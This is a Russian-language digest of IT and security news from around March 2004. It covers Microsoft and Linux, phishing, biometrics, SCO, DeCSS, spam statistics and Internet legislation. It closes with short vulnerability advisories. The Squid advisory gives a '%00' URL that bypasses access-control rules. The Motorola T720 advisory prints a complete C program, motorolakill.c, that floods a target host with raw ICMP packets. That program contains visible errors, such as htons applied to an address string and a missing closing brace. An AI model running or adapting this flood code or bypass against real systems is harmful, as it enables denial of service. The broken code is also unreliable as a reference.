Глава Microsoft снова говорит о недостатках Linux

Глава компании Microsoft Стив Баллмер в очередной раскритиковал операционную системы Linux. Выступая на бизнес-конференции Can>Win04 в Торонто (провинция Онтарио, Канада) Баллмер сообщил, что выбор в пользу Linux чаще диктуется не экономическими, а политическими мотивами. Имеено так было в случае перевода на Linux администрации немецкого Мюнхена. Тогда Microsoft предложила более низкие цены по сравнению с поставщиками Linux-решений, но выбор был сделан все же в пользу свободного ПО, сообщает Compulenta.ru.

По словам Баллмера, при крупных внедрениях программных продуктов цена дистрибутивов играет очень небольшую роль - ее доля в совокупной стоимости владения ПО составляет всего около 3%. "Если компании рассмотрят расходы на информатизацию в целом (настольные компьютеры, электронную почту и т.д.), то у Microsoft выходит дешевле", - отметил Баллмер. "Гадом буду, если это не так", - смело подытожил глава Microsoft.

В то же время, Баллмер согласился, что в случае миграции с Unix на Linux все не так однозначно. Дело в том, что Unix и Linux имеют много общего, и стоимость смены программной платформы получается ниже, так как персоналу почти не приходится переучиваться. Это подтвердил и представитель городской администрации Калгари (канадская провинция Альберта) Дэн Райан. Комментируя речь Баллмера, он отметил, что глава Microsoft говорил о ситуации выбора между Windows и Linux, но не между Unix и Linux. В администрации Калгари продолжают активно применять Windows, но для замены серверов на Unix город выбрал компьютеры на базе Linux.

Баллмер также коснулся проблем с безопасностью продуктов Microsoft. Он еще раз подчеркнул, что подход к обеспечению безопасности в Microsoft стал совершенно другим и выразил уверенность в том, что вскоре продукты Microsoft станут эталоном безопасности. Глава Microsoft также отметил, что компания продолжит эксперименты с изменением условий лицензирования, хотя зачастую даже небольшие модификации в этих условиях порождают лавину жалоб и проблем.

Вешняков: Среди хакеров были не только любители, но и профессионалы

"Обеспечение информационной безопасности при голосовании - одна из основных задач при проведении выборов президента России", - заявил глава Центризбиркома РФ Александр Вешняков. Как сообщает РИА "Новости", глава ЦИК заметил, что "на предстоящих президентских выборах мы должны показать еще большую открытость при подведении итогов голосования, оперативность, а также очень важной задачей является обеспечение безопасности голосования".

Вешняков пояснил, что в декабре на парламентских выборах было зафиксировано около 900 атак на сайт, посвященный выборам. Эти атаки, по словам Вешнякова, производились не только любителями-хакерами, но и иностранными государствами и организациями. Вешняков напомнил, что в 2003 году испытано и введено в действие новое программное обеспечение для системы "ГАС-Выборы". "Создана база данных, позволяющая объединить информацию по большинству российских регионов", - сказал он. Кроме того, по словам Вешнякова, введено 16 каналов спутниковой связи, охватывающих всю территорию России. В рамках системы "ГАС-Выборы" было установлено более тысячи единиц нового компьютерного оборудования и 7 тысяч серверов, что позволило увеличить объемы передаваемой информации в 30 раз, а скорость передачи данных - в 45 раз.

Покажи палец — и заходи на сайт

Сейчас уже всем стало ясно, что парольная защита — это не только неудобный, но она еще и крайне ненадежный способ аутентификации. Для каждого сайта нужен отдельный пароль, их все очень трудно запомнить. Для хакеров же узнать чужие пароли проще простого.

Как показывают специализированные исследования, большинство пользователей пренебрегают основами безопасности и используют одни и те же пароли для разных сайтов, поэтому их персональная информация является исключительно уязвимой.

Какая существует альтернатива парольной защите? Различные фирмы сейчас предлагают разнообразные решения, которые должны обеспечить надежную аутентификацию пользователей и защитить их от воровства персональных данных (identity thieft). Можно сказать, что в начале 2004 года появился целый арсенал новых инструментов, которые решают эту проблему. Специалисты по безопасности надеются, что благодаря новым технологиям пароли можно будет навсегда оставить на свалке истории.

Корпорация Microsoft предлагает свое решение проблемы. Совместно с известной компанией RSA Security, криптоалгоритмы которой встроены в каждый браузер Internet Explorer, а также во многие мобильные телефоны, разработана новая технология под названием SecurID. Данная система предусматривает раздачу каждому пользователю маленького брелка, который можно повесить на связку с ключами. На маленьком мониторчике этого брелка каждые 60 секунд появляется случайное число. На главном сервере RSA работает тот же криптоалгоритм, которые генерирует те же самые числа в то же самое время. Для входа в сеть пользователь должен ввести свой пароль (пин-код) и дополнительно число, которое в данный момент генерирует крипточип в его брелке. Хакер не имеет абсолютно никакой возможности проникнуть в систему, если у него отсутствует брелок SecurID. В то же время при получении брелка хакер все равно не может войти в сеть, потому что он не знает пин-код. На этой неделе фирма RSA Security выпустила первую версию системы SecurID под Microsoft Windows.

В то же время защитники биометрических способов аутентификации уверены, что никакие пароли, пин-коды и брелки с цифрами не могут сравниться по надежности аутентификации со сканированием пальца или сетчатки глаза. «Такие системы в любом случае являются более безопасным решением, потому что биометрическая информация защищена от воровства», — говорит Тревор Прауд (Trevor Prout), директор по маркетингу Международной биометрической группы (International Biometric Group) из Нью-Йорка.

Многие компании предлагают биометрические решения, но ни одно из них пока не получило широкого распространения из-за слишком высокой стоимости. Покупку дорогих сканеров и специального софта пока могут позволить себе только спецслужбы и государственные агентства. Кроме того, аналитики отмечают еще один скользкий момент — приватность. Ведь многие люди действительно обеспокоены тем, что их отпечатки пальцев будут храниться в многочисленных базах данных.

Тем не менее, несмотря на все сложности, эксперты предсказывают, что биометрическая аутентификация получит широкое распространение в будущем. По информации Международной биометрической группы, уже сейчас оборот этой индустрии составляет $1 млрд, а к 2008 году объем продаж биометрического оборудования вырастет до $4,6 млрд.

Сейчас на рынке появляются системы для потребительского рынка по вполне доступной цене. Например, последняя модель сканера отпечатков пальцев Sony Puppy 810 стоит всего $170. Эта модель появится в продаже весной 2004 г.

Но сканер Sony далеко не самый дешевый. Настоящей сенсацией на рынке должен стать сканер Personal Biometric Pod производства American Power Conversion Corp. стоимостью всего $50. Впрочем, он не предусматривает полного отказа от паролей. Просто пароли будут вводиться автоматически, когда пользователь прикладывает палец к устройству, и не нужно их запоминать и набирать вручную. Покажи палец — и заходи на сайт.

Интернет-мошенничество в 2003 году увеличилось в шесть раз

Миллионы потребителей услуг Интернет-банков подвергаются опасности со стороны постоянно растущего мошенничества, связанного с завладением конфиденциальной информацией о пользователе обманным путем, т.н. «фишинг» (phishing).

Полиция предупреждает, что в прошлом году уже три финансовых организации Великобритании потеряли по 20 миллионов фунтов стерлингов из-за действий мошенников такого рода, а общее количество таких компьютерных преступлений увеличилось более чем на 600%.

Среди организаций, ставших жертвами мошенников, такие известные банки как Halifax, Barclays, NatWest, Lloyds TSB и HSBC.

«Фишинг» заключается в рассылке миллионов электронных писем (так называемая «фишинг-разведка»), после чего «попавшимся» пользователям предлагают зайти на специально созданные мошенниками web-сайты и замаскированные под легальный сайт банка или другой финансовой компании, клиентом которой является жертва. Как правило, такие сайты имеют свое происхождение из Восточной Европы.

Пользователю предлагается ввести свое имя, номер кредитной карты, счета, пароли и другую информацию. После этого вся информация попадает в руки мошенников, которые используют ее для перевода денег и осуществления других транзакций в Интернете, с применением легального web-сайта банка.

Специалисты советуют, если Вы получаете e-mail с предложением посетить какой-либо web-сайты банка и ввести свое имя и пароль, просто не делайте этого. Ни один настоящий банк никогда не станет просить Вас сделать этого.

По прогнозам специалистов, к 2007 году количество потребителей услуг Интернет-банкинга составит 84 миллиона.

Вирусная двадцатка за февраль 2004 г.

Лаборатория Касперского" опубликовала двадцатку самых распространенных вредоносных программ в феврале 2004 г.

Информационная служба  "Лаборатория Касперского"
 

SCO намерена подать иск против компании-пользователя Linux

Компания SCO, вот уже почти год ведущая непримиримую борьбу с корпорацией IBM и сообществом open-source, сделала новый выпад в сторону пользователей открытой операционной системы Linux. В ходе конференции Software 2004, проходящей в эти дни в Сан-Франциско (штат Калифорния), исполнительный директор SCO Дарл Макбрайд заявил, что его фирма намерена подать иск против крупной компании, использующей в своей работе ОС Linux. Об этом сообщает австралийская газета Sydney Morning Herald.

Интересно, что практически одновременно представитель SCO по связям с общественностью Блейк Стоуэлл поделился кое-какой информацией о крупной компании, якобы уже купившей лицензии на Linux. Речь идет о хьюстонской фирме EV1Servers.net, располагающей огромной аппаратной базой из двадцати тысяч Linux-серверов. Подробности сделки не разглашаются, однако известно, что стоимость лицензии на однопроцессорный сервер под управлением открытой ОС составляет 699 долларов США. Таким образом, нетрудно подсчитать, что минимальная сумма выплат EV1Servers.net должна вплотную приближаться к 14 миллионам долларов США. Представители EV1Servers.net, впрочем, от каких-либо комментариев отказались.

Следует напомнить, что SCO обвиняет корпорацию IBM в нарушении контрактных обязательств и незаконной передаче разработчикам сообщества open-source исходных кодов ОС Unix System V, права на которые принадлежат SCO. Согласно заявлениям SCO, фрагменты исходников впоследствии попали в состав ядер Linux с номерами 2.4 и выше. Именно на этом основании инициаторы конфликта требуют от пользователей данной ОС приобретения лицензий, а от IBM - выплаты компенсации в размере пяти миллиардов долларов США.

Суд покарал сайт за сообщение в форуме

Более года тянулась тяжба между компанией «Тройка сталь» и ООО «Мегасофт», владеющим сайтом MetalTorg.Ru. Вчера, 1 марта 2004 года, тяжба пришла к своему завершению.

Напомним, что компания «Тройка сталь» подала в суд на ООО «Мегасофт» за то, что на принадлежащем ей сайте MetalTorg.Ru, в форуме «Черный список» некий пользователь разместил информацию, «порочащую деловую репутацию» «Тройки сталь». Через 2 месяца разбирательств суд отказал «Тройке сталь» в удовлетворении иска.

История продолжилась, когда 17 сентября суд пересмотрел свое первоначальное решение в пользу ответчика и встал на сторону компании «Тройка сталь».

Сейчас, спустя год после начала этой истории, в Федеральном арбитражном суде Московского округа состоялось заседание кассационной инстанции по жалобе ООО «Мегасофт» на решение суда от 17 сентября 2003 года.

Кассационная инстанция оставила принятое ранее решение суда в силе, а жалобу ответчика — без удовлетворения. Согласно решению от 17 сентября 2003 года суд обязал ответчика опубликовать опровержение на страницах сайта www.MetalTorg.Ru той информации, которую истец считает ложной и порочащей его деловую репутацию. Суд также обязал ответчика выплатить истцу сумму денежных средств, заявленную в иске. Первоначально истец требовал приостановить работу раздела сайта, но судом это требование удовлетворено не было.

Таким образом, отмечают в «Мегасофте», в России создан прецедент, который ставит под угрозу существование ресурсов, содержащих такие интерактивные разделы, как форумы и гостевые книги, где пользователи свободно, без цензуры, могут высказывать свои мнения по интересующим их вопросам.

Шифрование DVD больше не является коммерческой тайной

Апелляционный суд пресек попытку киноиндустрии убрать из интернета программу-декодер DVD, заявив, что код шифрования настолько широко распространился, что не может более считаться коммерческой тайной. Как постановил апелляционный суд в Сан-Хосе, «общедоступные программные средства не могут по судебному решению быть удалены под предлогом защиты коммерческой тайны». Адвокаты компьютерных пользователей назвали это решение победой за право на «свободу слова» в киберпространстве.

«Традиционная свобода выражения прав не может быть принесена в жертву просто потому, что опубликованная в интернете информация когда-то была коммерческой тайной», - заявил юрист Робин Гросс (Robin Gross), работавший над этим делом, а так же являющийся отвественным директором группы, названной «IP-справедливость». Юристы Ассоциации по надзору за копированием DVD (DVD Copy Control Association) никак это не прокомментировали. Судебное решение может быть апеллировано в Верховном суде, который принял решение в пользу ассоциации по другому вопросу в этом деле в прошлом году.

Компьютерная программа DeCSS, позволяет обойти систему кодирования контента, которая создана для защиты DVD. Впервые программа была дизассемблирована в 1999 году 15-летним норвежцем Йоном Лехом Йохансеном (Jon Lech Johansen), который опубликовал её на своём веб-сайте. Программа была быстро скопирована и затем опубликована на сайтах по всему миру пользователями. Также сделал и Эндрю Баннер (Andrew Bunner), дело о нарушении коммерческой тайны против которого было возбуждено в декабре 1999 года ассоциацией по надзору за копированием DVD. Судья Верховного суда округа Санта-Клара в январе 2000 года издал приказ, по которому Баннер и другие должны были удалить DeSCC с их веб-сайтов. В прошлом августе Верховный суд штата решил, что тот приказ не нарушал свободы слова, заявив, что решение судьи было направлено на защиту прав собственности, а не запрещение свободных взглядов. Однако, суд не решил, была ли программа DeSCC коммерческой тайной или есть ли факт незаконного присвоения этой тайны Баннером. На прошлой неделе апелляционный совет заявил, что ассоциация по надзору за копированием не имеет достаточных оснований для этого запрета.

«К тому времени, когда был подан этот иск, сотни веб-сайтов уже содержали программу, давая возможность неизвестному количеству лиц копировать и использовать её, - заявил судья Юджин Премо (Eugene Premo). - ... Из-за того, что DeCSS так широко распространена, сама технология шифрования могла уже утратить статус коммерческой тайны». Премо также заявил, что ассоциации, по всей видимости, не удалось доказать факт хищения Баннером продукта, представляющего коммерческую тайну. DeCSS могла быть широко доступна к тому времени, когда Баннер скопировал её и свидетельств того, что он знал о незаконном происхождении программы, либо очень мало, либо вовсе нет, по словам Премо. Адвокат Баннера Ричард Виб (Richard Wiebe) заявил, что в мае он будет просить судью Верховного суда огласить окончательное решение в пользу своего подопечного и отказать ассоциации в добровольной попытке отозвать иск, которая была ею предпринята в прошлом месяце.

Еврокомиссия признает виновность Microsoft?

Еврокомиссия подготовила решение по антимонопольному иску против Microsoft, в котором компания признается виновной в злоупотреблении своим доминирующим положением на рынке операционных систем. Среди рассматривающихся вопросов – решение, будет ли Microsoft признан виновным в использовании своего доминирующего положения, чтобы захватить серверный рынок и является ли законным включение Media Player в ОС Windows. Независимо от этого, Федеральная торговая комиссия Японии провела проверку в офисе Microsoft в Токио в рамках исследования, нарушает ли компания местный антимонопольный закон.

В Европе заседание комиссии по антимонопольному вопросу состоится в Брюсселе 15 марта, после которого вкратце будет оглашено окончательное решение. Как ожидается, Microsoft будет признан виновной в нарушении европейского антимонопольного закона, поскольку отказывается предоставлять техническую информацию по своей ОС и медиа-ПО третьей стороне. Вторая комиссия будет собрана, чтобы определить санкции против компании. При этом не отрицается возможность того, что Microsoft попытается достигнуть урегулирования этого вопроса еще до вынесения окончательного решения. Такая попытка со стороны компании уже предпринималась, однако предложенный ею способ поставлять ПО конкурентов на компакт-дисках вместе с ПК не был признан Еврокомиссии как недейственный.

Контрафактная продукция – по цене лицензионной

Самую крупную за последние годы партию поддельных аудио- и видеокассет, а также компакт-дисков изъяли сотрудники управления СБУ в Полтавской области и Государственного департамента интеллектуальной собственности Министерства образования и науки Украины. Их стоимость потянула почти на 85 тысяч гривен. Но что самое важное – удалось ликвидировать подпольный цех, откуда поступала контрафактная (нелицензионная) продукция. Он размещался в полуподвальном помещении возле Центрального колхозного рынка и обеспечивал пиратской продукцией 10 торговых точек на самом базаре, несколько специализированных отделов в ЦУМе и универсаме г.Полтавы, а также пункты продажи в некоторых районах области. В цехе, организованном одним из частных предпринимателей, были установлены около тридцати аудиомагнитофонов, полтора десятка видеомагнитофонов и один DVD-плеер, которые практически всегда «крутились». За исключением плеера, вся техника была изношена, что отражалось на качестве продукции. Хотя внешне, благодаря хорошей упаковке, она выглядела привлекательно и даже имела голографические контрольные марки. Правда, под одним и тем же идентификационным номером продавались разные кассеты, и даже разные фильмы.

«По всей видимости, с настоящих контрольных марок стиралась нанесенная на них информация и наносилась другая, - сказал главный государственный инспектор по вопросам интеллектуальной собственности Министерства образования и науки Юрий Кучинский. – Откуда поступали к организаторам подпольного бизнеса настоящие голограммы, а также печатная продукция, еще предстоит выяснить. Однако уже сейчас можно сказать, что нам удалось ликвидировать одно из звеньев преступной межрегиональной группировки».

«Из подпольного цеха выходила продукция довольно сомнительного качества, - добавил начальник отдела УСБУ в полтавской области Олег Дигтярь. – Подделку можно было отличить по тому, что текстовые материалы подавались лишь на английском языке, на них не был указан производитель, да и вообще, выглядели кассеты и диски непривлекательно. Но цены на свой товар, чтобы у покупателей не возникло подозрений, они подгоняли под официальные, а «левые» компакт-диски, завезенные, скорее всего, из Киева, продавали, что называется втридорога».

Там, где деньги

По данным компании Sophos, наибольшее количество спама исходит сегодня из США, Канады, Китая, Южной Кореи и Нидерландов.

Компания Sophos, занимающаяся вопросами компьютерной безопасности, составила свою "грязную дюжину" на основании двухдневного среза почтового трафика, взятого в середине февраля. Как оказалось, 56,7% всего мирового спаммерского трафика генерируется с территории Соединенных Штатов. На долю Канады, Китая и Южной Кореи пришлось всего 6,8%, 6,2% и 5,8% спама соответственно. Жители Голландии сумели сгенерировать жалкие 2,1 процента мирового объема спама. Правда, как пишет CNET, это все равно миллионы и миллионы рекламных писем в день.

Оставшиеся семь стран, вошедшие в "грязную дюжину", сумели отправить всего десятую долю спама на круг: это Бразилия, Германия, Франция, Соединенное Королевство, Австралия, Мексика и Испания. Почтовые серверы других государств мира отвечают за оставшиеся 12,2 процента спама.
 

ИнАУ будет препятствовать правонарушениям в Интернет

Правление Интернет Ассоциации Украины утвердило состав Комитета по вопросам безопасности и предупреждения правонарушений в информационных системах.

Как сообщается в пресс-релизе, переданном ForUm’у, основная задача комитета – препятствие злоупотреблениям с использованием информационных систем. Деятельность Комитета будет направлена на защиту интересов большого количества участников Интернет рынка, включая конечных пользователей.

В рамках этих направлений Комитет будет заниматься разработками рекомендаций по добросовестному использованию услуг Интернет и методики преследования правонарушений, совершаемых в Интернет или с его помощью, на базе действующего законодательства Украины. Помимо этого, запланирована разработка информационной базы по фактам злоупотребления возможностями глобальных компьютерных сетей, а также обобщение практики и выработка рекомендаций по выбору методов технологической защиты в Интернет.

В состав комитета входят ведущие специалисты компаний – членов ИнАУ, а также других компаний, заинтересованных в его работе. Комитет является рабочим органом Правления ИнАУ и действует на общественных началах.

Комитет возглавил Виталий Зубок – член Правления ИнАУ, заместитель директора Информационного центра «Элвисти»

Интернет Ассоциация Украины создана в 2000 году с целью содействия развитию украинского сегмента глобальной сети Интернет. ИнАУ объединяет порядка 70 ведущих участников рынка Интернет Украины — сервис-провайдеров, контент-провайдеров, регистраторов, поставщиков оборудования. С более детальной информацией можно познакомиться на сайте www.inau.org.ua.

Правительство переведет госучреждения на использование исключительно лицензионного ПО

Правительство продолжает принимать меры для перехода органов исполнительной власти на использование исключительно лицензионного продукта. Об этом сообщил заместитель председателя Государственного департамента интеллектуальной собственности Владимир Дмитришин во время экспертного обсуждения сценариев развития рынка ПО в Украине, проведенного компанией GfK-USM в рамках выполнения исследования рынка ПО по заказу Коалиции по вопросам защиты прав интеллектуальной собственности (CIPR).

По словам В. Дмитришина, сейчас на рассмотрении правительства находится проект порядка легализации компьютерных программ в органах исполнительной власти.

Документ регламентирует механизм определения потребностей государственных органов в компьютерных программах, закрепляет прозрачный порядок финансирования мероприятий с легализации, предусматривает необходимые объемы финансирования на легализацию и организацию закупки лицензионных экземпляров компьютерных программ в бюджетных запросах.

Кроме того, как отметила в своем сообщении прессы служба Государственного департамента интеллектуальной собственности, постановлением Кабинета Министров Украины “Об утверждении Порядка использования компьютерных программ в органах исполнительной власти” предусмотрено ежегодное проведение инвентаризации ПО, возможность осуществления внезапных проверок использования компьютерных программ в органах исполнительной власти, определены обязанности пользователей компьютеров и другие механизмы, которые позволят осуществлять текущий контроль над соблюдением авторских прав в органах исполнительной власти.

Отмеченные документы разработаны во исполнение Концепции легализации программного обеспечения и борьбы с нелегальным его использованием.

По мнению В. Дмитришина, реализация положений этих документов “позволит правительству стать примером для других пользователей ПО по вопросу соблюдения авторских прав”.

Интернет завалят законами

Вчера сразу два источника сообщили о том, что разрабатываются законы об Интернете. Один из вариантов уже одобрен профильными комитетами Госдумы, другой - победил в конкурсе на лучшую законодательную инициативу.

Агентство "Алгоритм" сообщило о том, что недавно закончилась работа над проектом закона "Об Интернете". Над ним различные ведомства, и он, согласно сведениям "Алгоритма", уже одобрен профильными комитетами Государственной Думы.

Тот же источник утверждает, в работе принимали участие и представители Министерства иностранных дел РФ, которые "постарались реализовать" в нем рекомендации ООН и ЮНЕСКО.

По предварительным данным, новый закон, содержание которого пока не разглашается, более жестко регламентирует отношения в российском сегменте Интернета. По непроверенным данным, пользователям потребуется получать разрешение на регулярное использование Интернета.

Как сообщил Интернет.ру юрист Виктор Наумов, владелец интернет-ресурса "Право и Интернет", более подробная информация о Законе пока недоступна.

Вчера же "Седьмая столица" сообщила о том, что первое место в конкурсе на лучшую законодательную инициативу в области обеспечения защиты прав и свобод человека и гражданина, объявленном Фондом развития парламентаризма в России, занял проект федерального закона "О правовом регулировании оказания Интернет-услуг".

Автор этой законодательной инициативы - юрисконсульт компании "Объединенная Энергия", кандидат юридических наук С.Петровский.

Концепция проекта закона исходит из принципа минимального государственного вмешательства в отношения по поводу Интернета и установления жестких правил лишь в тех случаях, когда неурегулированность создает угрозу информационной безопасности России, соблюдению прав граждан и юридических лиц. Учтены также рекомендации международных организаций.

Законопроект регулирует порядок сбора, хранения и распространения сведений о пользователе Интернета (допускается только с его согласия), предусматривает обязанность оператора связи соблюдать тайну сообщений, содержащихся в получаемых, хранящихся и отправляемых им данных потребителя услуги, детально регламентирует порядок заключения договоров интернет-услуг, электронной почты, подключения к сети, хостинга и т.д.

Предпринята попытка ввести критерий признания данных, распространяемых по сети, массовой информацией. Это "данные, периодически передаваемые в тысячу или более адресов пользователей Интернет в течение дня". При этом учитываются только адреса, находящиеся на территории России.

Порядок определения количества пользователей устанавливается органом, осуществляющим государственную регистрацию средств массовой информации. Соответственно информационные ресурсы, передающие данные, признаваемые массовой информацией, должны быть зарегистрированы в качестве СМИ.

Учитывая то обстоятельство, что конкурс проводился в рамках проекта "Законотворчество", реализуемого "Открытой Россией", есть серьезные основания сомневаться в том, что Госдума заинтересуется его победителем. Ведь в числе учредителей этой организации - опальный ЮКОС, пишут "Регионы.ру".
 

Китайские попрошайки обживают Всемирную паутину

«Нищие» с юго-запада Поднебесной покидают улицы и перебираются в онлайн. Веб-плуты стряпают душещипательные истории и отправляют электронные призывы «пожертвовать копеечку» по всему Интернету.

Г-н Чжанг из провинции Сычуан недавно получил одно из подобных сообщений и отправил его в СМИ.

Содержание е-письма выглядит приблизительно так: «Я местный житель Ченьду. Мой папа умер, когда я был ребенком, а моя мама серьезно больна. Моя подруга недавно бросила меня. Я в депрессии – я не могу выйти из дома. Будьте так добры, помогите мне. Мне очень нужны 10 юаней (1,2 доллара) на еду». Отправитель указал имя -  Ли Дан -  и номер банковского счета.

Позже Ли Дан был найден репортерами через китайский чат QQ. Он  подтвердил, что ему 21 год и что он недавно был исключен из колледжа: «Я начал просить милостыню через Сеть ради веселья. Однако когда был получен первый взнос в 10 юаней, я решил заняться этим всерьез».

По словам Ли Дана, он знаком еще с десятком аналогичных «бедняков», которые сидят дома, строчат электронные письма и отправляют их по тысячи штук на день. Члены нестандартного сообщества поддерживают связь друг с другом через чаты, где охотно обмениваются опытом.

Ли предупреждает, что некоторые послания приходят от коварных людей, которые не являются бедняками, а рассчитывают на человеческое сострадание. Настоящие веб-попрошайки идентифицирует себя, опубликовав в Интернете истинные электронные адреса и имена, -сообщает Xinhua.

Новая уязвимость в браузере Internet Explorer

Специалисты компании iDefense, специализирующейся на вопросах компьютерной безопасности, предупреждают об обнаружении очередной уязвимости в браузере Internet Explorer. Дыра представляет угрозу для пользователей IE версий 5 и 6, работающих под управлением операционных систем Windows 2000 Professional и Windows XP Professional.

Как сообщается, проблема связана с ошибкой в системе проверки подлинности доступа при выполнении некоторых рутинных операций. Из-за этой недоработки программный код, ассоциированный с окном ввода информации в одном домене, способен взаимодействовать с окнами ввода данных в других доменах. В результате, злоумышленник получает возможность воровать какие-либо персональные сведения, вводимые пользователями Всемирной сети.

Для проведения атаки хакеру достаточно заманить жертву на сформированный определенным образом сайт. Ссылка на такой ресурс может быть отправлена, к примеру, в теле электронного сообщения. Причем название самой ссылки, а также внешний вид вредоносной страницы могут быть позаимствованы у какого-либо заслуживающего доверия сайта. Таким образом, невнимательный пользователь может даже и не обратить внимания на то, что URL несколько отличается от адреса, соответствующего ресурсу, указанному в письме. А это, в свою очередь, может стать причиной утери конфиденциальной информации - банковских счетов, номеров кредитных карт и пр. Ситуация усугубляется еще и тем, что дыра может использоваться в комплексе с другой уязвимостью, позволяющей выводить в адресной сроке браузера фальшивые URL.

Корпорация Microsoft пообещала устранить проблему в будущих пакетах обновлений для Windows 2000 и Windows XP и порекомендовала всем пользователям установить уже выпущенные заплатки.

Обнаружена дыра в архиваторе WinZip

Сотрудники компании iDefense сообщили об обнаружении опасной дыры в одном из самых популярных архиваторов WinZip. Уязвимость теоретически может использоваться для выполнения на удаленной машине произвольного программного кода. При этом брешь присутствует сразу в нескольких модификациях программы - WinZip 7, 8, а также последней бета-версии WinZip 9.

Для того чтобы воспользоваться уязвимостью, злоумышленнику достаточно внедрить вредоносный код в сформированный определенным образом архивный файл форматов .mim, .uue, .uu, .b64, .bhx, .hqx или .xxe. Впоследствии данный файл может быть отправлен жертве по электронной почте, через файлообменную сеть или каким-либо иным способом. После того как ничего не подозревающий пользователь попытается просмотреть содержимое архива при помощи WinZip, на его компьютере будет автоматически исполнен внедренный хакерами код.

Следует заметить, что обычно WinZip не запускает на выполнение находящиеся в архиве файлы. Именно по этой причине многие пользователи не боятся заглядывать внутрь архивов, присланных из неизвестных источников или загруженных из Всемирной сети. Однако дыра, обнаруженная компанией iDefense, в корне меняет ситуацию.

Впрочем, избежать атаки можно путем отключения функции автоматической обработки файлов указанных типов архиваторами WinZip. Кроме того, данная ошибка устранена в финальной версии WinZip 9, а архивы в форматах .mim, .uue, .uu, .b64, .bhx, .hqx и .xxe встречаются достаточно редко.

Обход ограничений доступа в Squid Proxy Cache сервере

Программа: Squid-2.x up до версии 2.5.STABLE4 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Squid Proxy Cache сервере в обработке URL, содержащих '%00'. Удаленный пользователь может обойти некоторые ограничения доступа. Уязвимость в функции '%xx' URL декодирования позволяет удаленному пользователю обойти ограничения доступа, основанные на 'url_regex' access control list (ACL). Например, URL типа 'http://foo%00@www.example.com/' не будет обнаружен, если используется следующий вид ACL: acl BadSite url_regex www\.example\.com http_access deny BadSite URL производителя:http://www.squid-cache.org/Advisories/SQUID-2004_1.txt Решение:Установите последнюю версию программы: ftp://ftp.squid-cache.org/pub/squid-2/STABLE/

Squid Proxy Cache Security Update Advisory SQUID-2004:1

Удаленный отказ в обслуживании против Motorola T720 телефонов

Программа: Motorola T720 Опасность: Низкая Наличие эксплоита: Да Описание: Уязвимость обнаружена в Motorola's T720 мобильных телефонах. Удаленный пользователь может аварийно завершить работу телефона. Когда устройство получает некоторое количество IP трафика, телефон выключится при попытке пользователя получить доступ к IP сети. Пример: 1. Подключите телефон к Интернет 2. Пошлите на устройство большое количество IP трафика (например SYN пакеты или ICMP_ECHO запросы). 3. Запустите Wap браузер. Пример/Эксплоит: # motorolakill.c #include <stdio.h> #include <stdlib.h> #include <netinet/in.h> #include <netdb.h> #include <netinet/ip.h> #include <netinet/ip_icmp.h> int main(int argc, char *argv[]) { if(argc < 2) { printf("Usage: %s <host>\n", argv[0]); exit(0); } int sock; char packet[5000]; int on = 1; struct sockaddr_in dest; struct hostent *host; struct iphdr *ip = (struct iphdr *) packet; struct icmphdr *icmp = (struct icmp *) packet + sizeof(struct iphdr); if((host = gethostbyname(argv[1])) == NULL) { printf("Couldn't resolve host!\n"); exit(-1); } if((sock = socket(AF_INET, SOCK_RAW, IPPROTO_ICMP)) == -1) { printf("Couldn't make socket!\n"); printf("You must be root to create a raw socket.\n"); exit(-1); } if((setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on))) < 0) { perror("setsockopt"); exit(1); } dest.sin_family = AF_INET; dest.sin_addr = *((struct in_addr *)host->h_addr); ip->ihl = 5; ip->id = htons(1337); ip->ttl = 255; ip->tos = 0; ip->protocol = IPPROTO_ICMP; ip->version = 4; ip->frag_off = 0; ip->saddr = htons("1.3.3.7"); ip->daddr = inet_ntoa(dest.sin_addr); ip->tot_len = sizeof(struct iphdr) + sizeof(struct icmphdr); ip->check = 0; icmp->checksum = 0; icmp->type = ICMP_ECHO; icmp->code = 0; printf("Ping flooding %s!\n", argv[1]); /* begin flooding here. */ while(1) { sendto(sock, packet, ip->tot_len, 0, (struct sockaddr *)&dest, sizeof(struct sockaddr)); } return(0); URL производителя: http://www.motorola.com/ Решение:Способов устранения обнаруженной уязвимости не существует в настоящее время.

Motorola T720 cell phone DoS vulnerability.